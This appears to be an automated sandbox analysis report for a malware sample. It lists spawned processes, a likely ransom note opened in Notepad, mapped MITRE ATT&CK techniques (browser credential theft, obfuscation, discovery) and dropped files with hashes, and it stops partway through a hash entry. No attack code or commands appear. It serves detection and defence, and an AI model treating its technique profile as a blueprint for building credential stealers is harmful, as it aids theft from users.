  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
  2⤵
  PID:5576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
  2⤵
  PID:5888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
  2⤵
  PID:4216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:1856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3900 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:1220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:8
  2⤵
  PID:2024
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:2680
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x264,0x268,0x26c,0x240,0x270,0x7ff773d25460,0x7ff773d25470,0x7ff773d25480
    3⤵
    PID:2880
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5872 /prefetch:8
  2⤵
  PID:4032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
  2⤵
  PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
  2⤵
  PID:2388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,14674902488398340080,8056828767586971627,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
  2⤵
  PID:2588

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4212

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\PoorChecker.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\86248c56-79d9-4b18-b3d4-44173a35d668.tmp

Filesize
15KB

MD5
4bcd7f3e96b30239261f7f3110c39448

SHA1
3a22b94201e7d50bdcb38721daaef43862fd3a58

SHA256
8bc24872a1bf46adcb044f9c9ee3d934a300165572bc61db9a262db2168c6f56

SHA512
1554ba89bc7a9692c1c28311c956ac583516f855ab90716a60f08ba0c07ad2f7bde49debe41f983423d0ba5289ad5bcb04305f39d8f94a5d18786e39261f5e00

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
6a539a820cedc937ac7773e2f1b9ab28

SHA1
9d7995a0450cdac99d89982e272def96d2000907

SHA256
5ac565baa115741ac9b0a08395257d31d3b025e73a1cd96e8379a3594c29328e

SHA512
14a71e9f7ad9365636b0a2bae274121ff806ae263ad7a0a2f5da6dd377b8ae33d58ac095b49f7e54c17a85af6e4dbf88dd8c4f9f3e40a334dad2a8c79a30f1d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
e579aca9a74ae76669750d8879e16bf3

SHA1
0b8f462b46ec2b2dbaa728bea79d611411bae752

SHA256
6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

SHA512
df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
b3d35589a1f2ba113bc71d1e644f73b5

SHA1
1e7d760f9b2ece01c38bcba26f83c156ef3a520b

SHA256
8c512e2eb0afed7ac81208a56577f4bbb294f6b3a035098f38976eea3fa62261

SHA512
7148ec6d24edbd42fd3fcd76f10054a54bc27dd0fc8ae456c319a5f50a0056eb5a9f00b1fc342f476182aa601ed988f3f81a71774dab44049e4c6792c0887b0e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
1b2be7543fef2cbad5cec2da0e6478ab

SHA1
5333d884804f334fbf79315b7572f38bad3976b2

SHA256
3afc70e76c6c993eeddcbc0851ca6865eb8718efe6d6eb9d2e499b733a3a3eef

SHA512
e63ba52269bd6baa099778cafa638d6566675705f3966f7ab9912625a10f0334bc6f2a919fb746553f91f3fad38ed11a6b118212573a721a2e7799f5dabd0124

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
c7e939e29190a5a5f904d4b9ef8af303

SHA1
4d4fc853cde31406b9a3b8f344b88e87d1801ba8

SHA256
395d878994e5c774d8a358a6082974bfd9cdcfe9ef18ed7c002cee301c1ec119

SHA512
4f800a95b257993c397a0c2c4241784bfe1d499b310ecfb93029100f247827f78d8b966aeb1bebe02478b4e02e041d5e87c7838b70cc545751ec0e9e40f1a650

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
74abbf5761880284e0f4412a8493f0d6

SHA1
156ea5b4d51459bf05f39e55dd1b7db1025419d8

SHA256
9883ba7daa677fc907c8136c2b9cf4eda87f93f31cca2387548aa0a2dd154acd

SHA512
d4970372c823ed9dd6fee1b6bef19ff0cf505691dd7c7746b728c0f3ea1b71b3016098fa47654c0425724ffaf92a52ae448a1641660eb07e224c8a535fb1da7b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
47c5dadb7bcb645df568c70579fd5e99

SHA1
f9ef8dbd740cf1fff869f64dd300a0e589ecf521

SHA256
ce72c9bc1e1f4f03f2617e32bc8f714802c26e935d65b7c450c12296b2017b8a

SHA512
99ca2b6ba2ef74bd22a550b261957d3792612df737dc12887384242a06e9be8c35047e5735b599f7f086c0857d91f14fe8c1621f818d0e84303a1b018915003c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
817d41ab28d2163ce54ab92234f4a86a

SHA1
97483919c2319847622a750a4614344cae577d88

SHA256
77c006c9797e6fe16abeb90d52454760b0d2f9762764d2787cdab35c530d45de

SHA512
19306f451960c81f21da7e60b175e4b676b5a83fdbf155b64d57276e282c7684b6c37e470ce8f14fc6170ed94ab3e1ac10d983ff7bd23494548d6223fd1779d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d39fa4cb6c4638c94ae2924d66bac91e

SHA1
e51768747b56f613415532a7e47b3240701870ba

SHA256
6f6d2baca6f1e2ca624f0e9f2604953cafd7b4fc4ee7678b606b52fe9aa3cf82

SHA512
2439fd965459eb9c7375a3ced8ae7d868a08c744b95ffc734e1902ec71810dca90917bf44852d5a371bf5777c096ee833e7542a17c01637da7ba2551e05f2785

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
554b090b46f9466a51ee4665fc06dc4b

SHA1
7eff41e86aadfbe2995b7354d41192a23c388b94

SHA256
ddea00a3be4a85b12386164498f2bea179afe5470d6532e1179c3380f1f4e40f

SHA512
f0414bc2dc5da00cf9abe8588c92aaf5b9e46e847105b90eb79d0f5a35ebfb1ce212fb23fa2d2e04161978921dded0b64d4d789f75320a2994a2cc03d4175aed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0e4c8853491bccf0b8192b137ebe31c8

SHA1
7aa8dd7ff2ccb9fd2d6f1e585336540bef7e7f34

SHA256
2872b2763500a7c111189265c89ee66a8808008d54f24378071cb7b3fad4267a

SHA512
51f29267948932e0f246f2405132ff97e824c864fe40da05ccf4d247d22f325ccc6a200ef4ef2ba1e1ea4f249ecf254d331a313d38d7d73e915cdd2f8fcac0d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cf4b32b702a6c895d729088a125eae97

SHA1
fdc37408973597814d465fff396dd060cbf5d53b

SHA256
12d188b4284ce7949e09fe05beaff263b0b94fb29d280ee1f5bf9cff34ebb99b

SHA512
1d1a30caf85ff8104a78cbe327b5ba037c30ed28627e5b697e051faa9d7c4b87bf5b098ac6cdd7588112dc03e4336cc885682907f5cc0da414d3fa70dd19de51

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
235KB

MD5
aca413ff4350c0995c1c8ccb14aabbbd

SHA1
e9fd54a20246274860138282a5f95e79f681bf50

SHA256
1ba13d26048a23101c431f6afec3b07b199c2c4776e8936e3316ee10f20c865c

SHA512
91e91c575c8f62f46f0e75e2510e47af7149e88473c4321e384608b2db8306e80b4be5c5fe0bc68e9e3344467f0db818dd7c114d111e35837ab58d922ddc14af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
235KB

MD5
bb1dc205f8e32d7c6e8e8f53ab57e4ac

SHA1
485ddf0dd3c56aba912ab5324e93b7b8fa553d8f

SHA256
0494b19581b016f76b1902ef2d8a83f7c823ca2fe2e5ae9c3be1dd999b710fa7

SHA512
d4d0432db07fed1ea86a4361271948f22b0518677d8058b5a7b73622d393d956b7c10c45b4abea4783f9932e3ab7b8b2c2fb75c383c75a7f6e96c88d373e1967

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
32d05d01d96358f7d334df6dab8b12ed

SHA1
7b371e4797603b195a34721bb21f0e7f1e2929da

SHA256
287349738fb9020d95f6468fa4a98684685d0195ee5e63e717e4b09aa99b402e

SHA512
e7f73b1af7c7512899728708b890acd25d4c68e971f84d2d5bc24305f972778d8bced6a3c7e3d9f977cf2fc82e0d9e3746a6ccb0f9668a709ac8a4db290c551c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b5fffb9ed7c2c7454da60348607ac641

SHA1
8d1e01517d1f0532f0871025a38d78f4520b8ebc

SHA256
c8dddfb100f2783ecbb92cec7f878b30d6015c2844296142e710fb9e10cc7c73

SHA512
9182a7b31363398393df0e9db6c9e16a14209630cb256e16ccbe41a908b80aa362fc1a736bdfa94d3b74c3db636dc51b717fc31d33a9fa26c3889dec6c0076a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
35241ee2b0f072f97de4d643a0e41b6f

SHA1
7b48211b82549904dbd0a7696d7584c3371d5ed0

SHA256
39ea5ec48f15c6e1aa5457048b97dc597436b44ffcfaad31838333b337622f1f

SHA512
8ce73d30a4a03e14172a44f322b303bbb3e16f76a34906fcf5bf97b2a9142ae81a2597a20c108c741076bffbd5ecf24d44087946411cab14b4844638fac1ddc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
f66f9bb3ffe5bd419fb72130276fa3c3

SHA1
105d2fa130041a0055c325f10b6ca6e4a7567ddd

SHA256
c42db01edfa44ff718e9ca56b6cb5c6fee09c8de39f316f459c24a94f34fc250

SHA512
e7af16848bb083d24890247e3a0c7b0714a091c73d8369c62bc0c7ba0abab9c34f77033ac09dd4446dca7c9743dc05539b42ef5601f7c07580e436aed89b4271

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9e889b060f70e9886e688d334a1c3568

SHA1
226f430d55f8eecc8b672acf208c51373c53f83e

SHA256
b35c8e704dcda350743677c7fe5f9a2c7b8f5a031ea7158211db3eec72436a21

SHA512
9b30c495280ecb7a605b63887cf6b197bd3fd8986f25cc9486dd57c0b2dca7cfcb2ec2b171bd3bc82c3a278e7a61b955ca545007fa5aa783a9aa40884c90991e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7dbd49be073361c98201ccd5e499d8ce

SHA1
6422f20ea559df1184cf4f5c53e7b3ab3e1af91a

SHA256
958d17d97cf4ec389697f774f135d865df8e825e02327d82a220c18aab84e3a9

SHA512
15d33cf993d925948c1bf5a29863e4e1746a5eaaab7b062db14103b1a1a055555aad62e4c591b2c0328859c4a3d15def63914a670db946f824685712cc914656

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
729cd0078046324b81a6e3ba779647e8

SHA1
5d82461fff1e2d244a8e36cd10ea0de928f6472f

SHA256
3dc3142d466ddee234f76b80956814afae9f658a90f638c89429b1969e9609ba

SHA512
0b91e0795f1dc9cc61705b294c86e6bc871dadeab892edd4f5d727a2f278740b8ebe5be5bbfeea7dbdd709c64c886a1c292111256cb7e978624e464959cf3061

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
6e466bd18b7f6077ca9f1d3c125ac5c2

SHA1
32a4a64e853f294d98170b86bbace9669b58dfb8

SHA256
74fc4f126c0a55211be97a17dc55a73113008a6f27d0fc78b2b47234c0389ddc

SHA512
9bd77ee253ce4d2971a4b07ed892526ed20ff18a501c6ba2a180c92be62e4a56d4bbf20ba3fc4fbf9cf6ce68b3817cb67013ad5f30211c5af44c1e98608cb9e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ac2b76299740efc6ea9da792f8863779

SHA1
06ad901d98134e52218f6714075d5d76418aa7f5

SHA256
cc35a810ed39033fa4f586141116e74e066e9c0c3a8c8a862e8949e3309f9199

SHA512
eec3c24ce665f00cd28a2b60eb496a685ca0042c484c1becee89c33c6b0c93d901686dc0142d3c490d349d8b967ecbbd2f45d26c64052fb41aad349100bd8f77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
2fbdab6c16cb16cd60a14f4f9204969a

SHA1
c3e2d07794d6ec233b14c60b0ef083f0fd8c48c4

SHA256
9557144b8a29956982d184302fd161513bf3cce0c7dc2958c1238e33529f5637

SHA512
9faad6399c9bfd6ff6daf2cc86aae84af12b98cb23dfb6dec9081159558c4d5a6afa7504103d46df6bdcf435184430ec5622e09d74319231f8a72cb53e2b2c1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe59fcb5.TMP

Filesize
1KB

MD5
163d362d450d40e1a1aaa26b0365f14b

SHA1
ffba0f21c84dafef8e2769ed6bb2d0ffb627abe3

SHA256
1fd1fc5776aa09e568a5274cd5b7625001e87e8bfa50544ec472ba2ac8c9e0db

SHA512
6413dd0277064a6ab9a0a4c524ac06969dd2f9be851dd8eeadaeba208b740075260b3b16bf08b2627c427456fad20b259755d0d7b6a131f984719fd02e1df81c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
9c0ffaddcd84e37bc38f21316baed895

SHA1
46b87f3dcbf51dd2f1674cea90cb96ab613729fa

SHA256
14f1a5b06065bb9c673fd25e98a49acb0754a92224f6d580fe4ea69fe405bf47

SHA512
768495460442ab7f6abdc0556cf488b72a76b7083c1a4caa3985b611a323eaefd14a0718ebb39fd680c677fd87aa3e00e60ee443c0dbfec614b4ec66d592058c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
af5575cf60e211c7fef1766ff9e7b511

SHA1
52c130491c5e78e80f119fdbdfc6b1162f5c9fd3

SHA256
0e653a59cd6f311ec6dd5b2cf02cc8d7abcbdc030fc366ea8103c64ee1db0dbb

SHA512
7b2616a7e2da677addbdfed59200ff9a4a7decd663ba38b4fb7aee77d77042f91cf527bc68175cfee1b9e1d75a6085b7092c4d1ddcec7d08321e017bb2c6f433

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15802\blank.aes

Filesize
123KB

MD5
e390ea2596ed660e6ba8c44f907ad43e

SHA1
b57fa3032c5a5a5e29ba37560af1d5393c1270ae

SHA256
f35d16be4aef0891adda874829f7f77fe6665fce6ed9cfa4b04a14be33d23c65

SHA512
e463267e64783fcbb0d132f739f8b6af5b1a88cf2f31ae6397ee7450861e296347120ce126748a0a06c9c9fe838bcb2c3aa9943c5e75afb28802587f0ef48e2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17642\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17642\_bz2.pyd

Filesize
46KB

MD5
0c13627f114f346604b0e8cbc03baf29

SHA1
bf77611d924df2c80aabcc3f70520d78408587a2

SHA256
df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

SHA512
c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17642\_ctypes.pyd

Filesize
57KB

MD5
38fb83bd4febed211bd25e19e1cae555

SHA1
4541df6b69d0d52687edb12a878ae2cd44f82db6

SHA256
cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

SHA512
f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17642\_decimal.pyd

Filesize
104KB

MD5
7ba541defe3739a888be466c999c9787

SHA1
ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

SHA256
